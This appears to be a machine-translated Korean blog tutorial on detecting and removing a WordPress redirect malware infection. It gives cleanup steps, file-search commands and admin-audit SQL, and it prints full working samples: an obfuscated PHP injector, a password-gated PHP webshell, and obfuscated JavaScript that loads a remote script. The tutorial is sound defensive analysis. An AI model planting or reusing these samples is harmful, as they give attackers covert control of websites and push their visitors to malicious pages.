WordPress는 확실히 가장 많이 사용되는 플랫폼입니다. CMS (Content Management System) 블로그와 초기 온라인 상점(WooCommerce 모듈 포함) 모두에 사용되므로 컴퓨터 공격(해킹)의 가장 큰 표적이 됩니다. 가장 많이 사용되는 해킹 작업 중 하나는 손상된 웹사이트를 다른 웹페이지로 리디렉션하는 것입니다. Redirect WordPress Hack 2023은 전체 사이트를 스팸 웹 페이지로 리디렉션하거나 결과적으로 사용자의 컴퓨터를 감염시킬 수 있는 비교적 새로운 악성 코드입니다.

WordPress에서 개발한 웹사이트가 다른 사이트로 리디렉션된다면 이미 유명한 리디렉션 해킹의 피해자일 가능성이 높습니다.

이 튜토리얼에서는 리디렉션에 감염된 웹사이트의 바이러스를 제거하는 데 필요한 정보와 유용한 팁을 찾을 수 있습니다. WordPress Hack (Virus Redirect). 댓글을 통해 추가 정보를 얻거나 도움을 요청할 수 있습니다.

WordPress 사이트를 리디렉션하는 바이러스 감지

웹 사이트 트래픽의 갑작스럽고 부당한 감소, 주문 수 감소(온라인 상점의 경우) 또는 광고 수익 감소는 무언가 잘못되었다는 첫 번째 징후입니다. 발각 “Redirect WordPress Hack 2023” (바이러스 리디렉션)도 가능합니다 “시각적” 웹사이트를 열었다가 다른 웹페이지로 리디렉션될 때.

경험상 대부분의 웹 악성코드는 인터넷 브라우저와 호환됩니다. Chrome, Firefox, Edge, Opera. Mac 사용자인 경우 이러한 바이러스는 Safari 브라우저에서 잘 보이지 않습니다. Safari의 보안 시스템은 이러한 악성 스크립트를 자동으로 차단합니다.

Redirect WordPress Hack에 감염된 웹사이트가 있는 경우 수행할 작업

첫 번째 단계는 당황하거나 웹사이트를 삭제하지 않기를 바랍니다. 감염된 파일이나 바이러스 파일도 처음에는 삭제하면 안 됩니다. 여기에는 보안 위반이 발생한 위치와 바이러스에 영향을 준 요소를 이해하는 데 도움이 되는 귀중한 정보가 포함되어 있습니다. 운영 방식.

웹사이트를 대중에게 폐쇄하세요.

방문자에게 바이러스 웹사이트를 어떻게 닫나요? 가장 쉬운 방법은 DNS 관리자를 사용하여 해당 IP를 삭제하는 것입니다. “에이” (도메인 이름) 또는 존재하지 않는 IP를 정의합니다. 따라서 웹사이트 방문자는 바이러스나 스팸 웹페이지로 이어질 수 있는 WordPress 리디렉션 해킹으로부터 보호됩니다.

당신이 사용하는 경우 CloudFlare DNS 관리자로서 귀하는 계정에 로그인하고 DNS 레코드를 삭제합니다. “A” 도메인 이름의 경우. 따라서 바이러스의 영향을 받은 도메인은 IP 없이 그대로 유지되어 더 이상 인터넷에서 액세스할 수 없습니다.

웹사이트의 IP를 복사하고 “노선” 오직 당신만이 접근할 수 있도록 말이죠. 컴퓨터에서.

Windows 컴퓨터에서 웹사이트의 실제 IP를 어떻게 변경합니까?

이 방법은 파일을 편집하여 특정 웹사이트에 대한 접근을 차단하는 데 자주 사용됩니다. “호스트”.

1. 메모장이나 다른 텍스트 편집기(관리자 권한으로)를 열고 파일을 편집합니다. “hosts“. 위치는 다음과 같습니다:

C:\Windows\System32\drivers\etc\hosts

2. 파일에서 “호스트” 추가하다 “노선” 귀하의 웹 사이트의 실제 IP에. 위의 DNS 관리자에서 IP가 삭제되었습니다.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. 파일을 저장하고 브라우저에서 웹사이트에 접속하세요.

웹사이트가 열리지 않고 파일에 아무 잘못도 하지 않은 경우 “호스트”, DNS 캐시일 가능성이 높습니다.

Windows 운영 체제에서 DNS 캐시를 지우려면 명령 프롬프트를 열고 다음 명령을 실행합니다.

ipconfig /flushdns

Mac/MacBook 컴퓨터에서 웹사이트의 실제 IP를 어떻게 변경합니까?

Mac 사용자의 경우 웹사이트의 실제 IP를 변경하는 것이 다소 간단합니다.

1. 유틸리티를 엽니다 Terminal.

2. 명령줄 실행(실행하려면 시스템 비밀번호 필요):

sudo nano /etc/hosts

3. Windows 컴퓨터와 마찬가지로 도메인의 실제 IP를 추가합니다.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. 변경 사항을 저장합니다. Ctrl+X (y).

당신이 한 후에 “노선”, 귀하는 Redirect WordPress Hack을 사용하여 감염된 웹사이트에 액세스할 수 있는 유일한 사람입니다.

전체 백업 웹사이트 – 파일 및 데이터베이스

감염되어도 “WordPress 해킹 리디렉션”, 전체 웹사이트의 일반 백업을 만드는 것이 좋습니다. 파일 및 데이터베이스. 아마도 두 파일의 로컬 복사본을 다음 위치에 저장할 수도 있습니다. public / public_html 데이터베이스도 그렇고.

바이러스 사용 파일 및 Redirect WordPress Hack 2023으로 수정된 파일 식별

주요 대상 파일은 WordPress 그래요 index.php (루트에서), header.php, index.php 그리고 footer.php 활성 WordPress 테마 중 하나입니다. 이러한 파일을 수동으로 확인하고 악성 코드 또는 악성 코드 스크립트를 식별하십시오.

2023년에는 일종의 바이러스가 “WordPress 해킹 리디렉션” 넣다 index.php 다음 형식의 코드:

(이 코드는 실행하지 않는 것이 좋습니다!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

해독하면 이 스크립트 악성 코드 이는 기본적으로 WordPress 웹사이트가 감염된 결과입니다. 이는 악성 코드 뒤에 있는 스크립트가 아니라 감염된 웹 페이지를 리디렉션할 수 있게 해주는 스크립트입니다. 위의 스크립트를 디코딩하면 다음과 같은 결과를 얻습니다.

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

이 코드가 포함된 서버의 모든 파일을 식별하려면 액세스 권한이 있는 것이 좋습니다. SSH Linux에서 파일 검사 및 관리 명령줄을 실행하기 위해 서버에 연결합니다.

관련: Google 검색을 통해 블로그가 감염되었는지 확인하는 방법 (워드프레스 바이러스)

다음은 최근 수정된 파일과 특정 코드(문자열)가 포함된 파일을 식별하는 데 확실히 도움이 되는 두 가지 명령입니다.

Linux에서 지난 24시간 또는 다른 기간 동안 변경된 PHP 파일을 어떻게 볼 수 있나요?

명령 “find” 사용이 매우 간단하며 사용자 정의를 통해 기간, 검색 경로 및 파일 유형을 설정할 수 있습니다.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

출력에서는 파일이 수정된 날짜와 시간, 쓰기/읽기/실행 권한(chmod) 및 해당 그룹/사용자가 속한 그룹.

더 많은 일수를 확인하고 싶다면 값을 변경하세요 “-mtime -1” 또는 사용 “-mmin -360” 분(6시간) 동안.

PHP, Java 파일 내에서 코드(문자열)를 검색하는 방법은 무엇입니까?

명령줄 “찾다” 특정 코드가 포함된 모든 PHP 또는 Java 파일을 빠르게 찾는 데 사용할 수 있는 방법은 다음과 같습니다.

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

이 명령은 파일을 검색하고 표시합니다. .php 그리고 .js 포함하는 “uJjBRODYsU“.

위의 두 명령을 사용하면 최근에 수정된 파일과 악성 코드가 포함된 파일을 매우 쉽게 찾을 수 있습니다.

올바른 코드를 손상시키지 않고 수정된 파일에서 악성 코드를 제거합니다. 내 시나리오에서는 악성 코드가 열리기 전에 배치되었습니다. <head>.

첫 번째 명령을 실행할 때 “찾다” WordPress의 것이 아니고 귀하가 저장하지 않은 새 파일을 서버에서 발견할 수도 있습니다. Redirect WordPress Hack 바이러스에 속하는 파일.

제가 조사한 시나리오에서는 셰이프파일이 서버에 나타났습니다. “wp-log-nOXdgD.php“. 파일입니다 “세대” 여기에는 리디렉션 바이러스가 사용하는 악성 코드도 포함되어 있습니다.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

유형 파일의 목적 “wp-log-*” 서버에서 호스팅되는 다른 웹사이트에 리디렉션 해킹 바이러스를 확산시키는 것입니다. 악성 코드 유형입니다 “webshell” 로 구성 기본 섹션 (일부 암호화된 변수가 정의되어 있음) 및 o 실행 섹션 이를 통해 공격자는 시스템에 악성코드를 로딩하여 실행을 시도한다.

변수가 있는 경우 POST 명명된 ‘bh‘ 암호화된 값 MD5 는 다음과 같다 “8f1f964a4b4d8d1ac3f0386693d28d03“, 그러면 스크립트가 암호화된 콘텐츠를 작성하는 것으로 나타납니다. base64 다른 이름의 변수 ‘b3‘ 임시 파일에 추가한 다음 이 임시 파일을 포함하려고 시도합니다.

변수가 있는 경우 POST 또는 GET 명명된 ‘tick'이면 스크립트는 해당 값으로 응답합니다. MD5 문자열의 “885“.

이 코드가 포함된 서버의 모든 파일을 식별하려면 일반적인 문자열을 선택한 다음 de 명령을 실행하십시오. “find” (위의 것과 유사). 이 악성코드가 포함된 모든 파일을 삭제하세요..

리디렉션 WordPress 해킹으로 악용되는 보안 취약점

이 리디렉션 바이러스는 다음을 통해 도착할 가능성이 높습니다. WordPress 관리자를 악용 또는 취약한 플러그인 관리자 권한이 있는 사용자를 추가할 수 있습니다.

WordPress 플랫폼을 기반으로 구축된 대부분의 웹사이트에서는 가능합니다. 테마 또는 플러그인 파일 편집관리 인터페이스에서(Dashboard). 따라서 악의적인 사람은 테마 파일에 악성 코드를 추가하여 위에 표시된 스크립트를 생성할 수 있습니다.

이러한 악성 코드의 예는 다음과 같습니다.

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript 태그를 연 직후 WordPress 테마 헤더에서 식별됨 <head>.

이 JavaScript를 해독하는 것은 매우 어렵지만 파일을 생성하기 위해 다른 스크립트를 가져올 가능성이 가장 높은 곳에서 다른 웹 주소를 쿼리한다는 것은 분명합니다. “wp-log-*” 우리가 위에서 이야기한 것입니다.

모든 파일에서 이 코드를 찾아 삭제하세요. PHP 체하는.

내가 아는 한, 이 코드는 수동으로 추가됨 관리 권한이 있는 새로운 사용자에 의해.

따라서 대시보드에서 악성 코드가 추가되는 것을 방지하려면 대시보드에서 WordPress 테마/플러그인을 편집하는 옵션을 비활성화하는 것이 가장 좋습니다.

파일 편집 wp-config.php 그리고 다음 줄을 추가하세요:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

이렇게 변경하면 WordPress 사용자는 대시보드에서 파일을 편집할 수 없습니다.

관리자 역할이 있는 사용자 확인

다음은 WordPress 플랫폼에서 관리자를 검색하는 데 사용할 수 있는 SQL 쿼리입니다.

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

이 쿼리는 테이블의 모든 사용자를 반환합니다. wp_users 관리자 역할을 할당한 사람입니다. 쿼리는 테이블에 대해서도 수행됩니다. wp_usermeta 메타를 검색하다 ‘wp_capabilities'에는 사용자 역할에 대한 정보가 포함되어 있습니다.

또 다른 방법은 다음을 통해 식별하는 것입니다. Dashboard → Users → All Users → Administrator. 그러나 대시보드 패널에서 사용자를 숨길 수 있는 방법이 있습니다. 그래서 사용자를 보는 가장 좋은 방법은 “관리자” WordPress의 위의 SQL 명령은 다음과 같습니다.

내 경우에는 데이터베이스의 이름으로 사용자를 식별했습니다. “wp-import-user“. 꽤 암시적이다.

또한 여기에서 WordPress 사용자가 생성된 날짜와 시간을 확인할 수 있습니다. 사용자 ID 역시 서버 로그를 검색하기 때문에 매우 중요합니다. 이렇게 하면 해당 사용자의 모든 활동을 볼 수 있습니다.

관리자 역할이 있는 사용자 삭제 그럼 당신은 모르는 거죠 비밀번호 변경 모든 관리 사용자에게. 편집자, 저자, 관리자.

SQL 데이터베이스 사용자의 비밀번호 변경 영향을 받은 웹사이트의

이 단계를 수행한 후 모든 사용자에 대해 웹사이트를 다시 시작할 수 있습니다.

하지만 위에서 제시한 내용은 2023년에 웹사이트가 Redirect WordPress Hack에 감염되는 수천 가지 시나리오 중 하나라는 점을 명심하세요.

귀하의 웹사이트가 감염되어 도움이 필요하거나 질문이 있는 경우 댓글 섹션이 열려 있습니다.